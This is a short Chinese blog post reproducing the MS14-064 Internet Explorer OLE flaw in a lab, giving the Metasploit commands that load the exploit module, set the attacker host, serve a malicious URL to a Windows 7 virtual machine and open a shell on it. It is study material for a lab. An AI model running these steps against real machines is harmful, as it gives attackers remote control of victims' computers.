ms14_064漏洞复现

一、环境准备

   win7虚拟机x1

  kali Linux虚拟机x1

二、实验步骤

1.打开kali虚拟机终端命令行输入以下命令启动metasploit

msfconsole

2.输入以下命令搜索ms14漏洞,并在其中找到metasploit的漏洞利用模块exploit/windows/browser/ms14_064_ole_code_execution

search ms14

3.输入以下命令加载漏洞利用模块

use exploit/windows/browser/ms14_064_ole_code_execution

   这里可以看到我们的漏洞利用模块已经被启动。

4.输入以下命令查看相关设置

show options

  需要我们注意的是这里的AllowPowershellP默认为false,SRCVHOST默认为0.0.0.0,需要我们手动更改。

5.分别输入以下两个命令更改设置,注意这里我的kali虚拟机IP地址为192.168.15.138,可以在终端输入ifconfig查看自己的IP地址。

set AllowPowershellP true    #设置AllowPowershellP为true
set SRVHOST 192.168.15.138    #设置SRVHOST为192.168.15.138(需要更改为自己的kali虚拟机IP)

   设置更改完成后在终端输入exploit/rexploit执行可以得到一串URL地址。

6.轮到我们的受害者登场,开启win7虚拟机,使用IE浏览器访问刚才得到的地址。

  这时只要点击允许,这台win7虚拟机就被我们拿下啦!

7.回到kali虚拟机终端可以看到我们的受害者win7(IP地址为192.168.15.140)已经被拿下

  输入以下命令查看

sessions -i

 8.输入以下命令进入shell

sessions -i 1

  接下来就可以利用windows命令进行下一步的行动啦!

  后渗透阶段可以参考https://www.cnblogs.com/hkgan/p/17339860.html#h_393931448232551682048192605

posted @ 2023-04-21 14:52  hkgan  阅读(259)  评论(0编辑  收藏  举报